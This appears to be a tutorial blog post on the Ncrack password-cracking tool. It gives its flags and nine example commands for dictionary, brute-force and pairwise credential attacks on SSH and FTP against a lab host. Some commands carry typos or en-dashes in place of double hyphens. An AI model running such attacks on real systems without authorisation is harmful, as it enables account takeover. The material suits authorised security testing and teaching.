🚋ncrack

The Ncrack is a password cracking tool and it is one of the powerful password cracking tools.

The tool was developed to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.

Even I and many security professionals rely on the Ncrack tool.

This tool is a command-line interface, So this is going to be a disadvantage. But anyway, this tool has positive reviews constantly every year. It allows for rapid, yet reliable large-scale auditing of multiple hosts.

Features in Ncrack tool

1. Allowing for very sophisticated brute-forcing attacks

2. Timing templates for ease of use

3. Protocols supported include SSH, RDP, FTP, Telnet, HTTP(S), WordPress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, and DICOM

4. Runtime interaction similar to Nmap

Usefull commands in Ncrack

Target specification:

-iX: Input from Nmap’s -oX XML output format -iN: Input from Nmap’s -oN Normal output format -iL: Input from list of hosts/networks –exclude: Exclude hosts/networks –excludefile: Exclude list from file

Service specification:

-p: services will be applied to all non-standard notation hosts -m: options will be applied to all services of this type -g: options will be applied to every service globally

Authentication:

-U: username file -P: password file –user: comma-separated username list –pass: comma-separated password list –passwords-first: Iterate password list for each username. Default is the opposite. –pairwise: Choose usernames and passwords in pairs.

Output:

-oN/-oX: Output scan in normal and XML format, respectively, to the given filename. -oA: Output in the two major formats at once -v: Increase verbosity level (use twice or more for greater effect)

Module:

SSH, RDP, FTP, Telnet, HTTP(S), WordPress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, DICOM

How to use the Ncrack tool

Finally, let’s get into the practical part and I am damn sure by end of the post, You will be familiar with using the tool.

Just follow the below examples and commands and try it and if you have any doubt comment down below or watch the video I made on Ncrack.

#ncrack -h

Example1, Default scan

To do a default scan just enter the service you are attacking and then mention the target like this

ncarck ssh://10.10.1.3

Example2, Using specific username & Password

let’s use a specific username and password to crack the target. For this we are using the -user and -pass command.

ncrack ssh://10.10.1.3 -user msfadmin -pass msfadmin

Example3, Dictionary attack

To do a dictionary attack you should have a list of usernames and passwords in a file and then you are ready to do a dictionary attack.

ncrack ssh://10.10.1.3 -U /home/protector/Downloads/username.txt -P /home/protector/Downloads/userpass.txt

Example 4, Pairwise attack

Suppose you don’t know the username and password and also you are really tired to create a list of dictionary files then leaving it to ncarck is great.

Ncrack creates the user and password and also does a successful login. So you have to sit back and do a waiting game.

ncrack -v –pairwise 10.10.1.3:21

Example 5, Brute forcing

If you have a custom username list and password just do brute-forcing by just entering this command

ncrack -user msfadmin,rkadmin -pass msfadmin,123 ftp://10.10.1.3

Example 6, Resume an attack

To resume an attack we just use the –resume command and mention the previous log file like this

ncrack –resume /root/.ncrack/restore.2024-01-01_09-46

Example 7, Timing

The ncrack timing is very similar to the nmap.

T5: Insane Scan

T4: Aggressive Scan

T3: Normal Scan

T2: Polite Scan

T1: Sneaky Scan

ncrack -user msfadmin,rkadmin -pass msfadmin,123 ftp://10.10.1.3 -T4

I have created small user name and password file due to time consumption.

sudo ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt ftp://10.10.1.3 -T4

Example 8, Multiple host attack

To attack multiple hosts just add the list of targets in a file and enter the file in the command

ncrack -user /home/protector/Downloads/username\ (copy).txt -pass /home/protector/Downloads/userpass\ (another\ copy).txt -iL /home/protector/Downloads/host1.txt -p21 -v

-iL: Specify the target host file

-p21: to mention the port to attack

Example 9, Output

To save the output to specific location

ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3:21 -oN normal.txt

or

ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3:21 > normal.txt

ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 -oX save.xml

cat normal.txt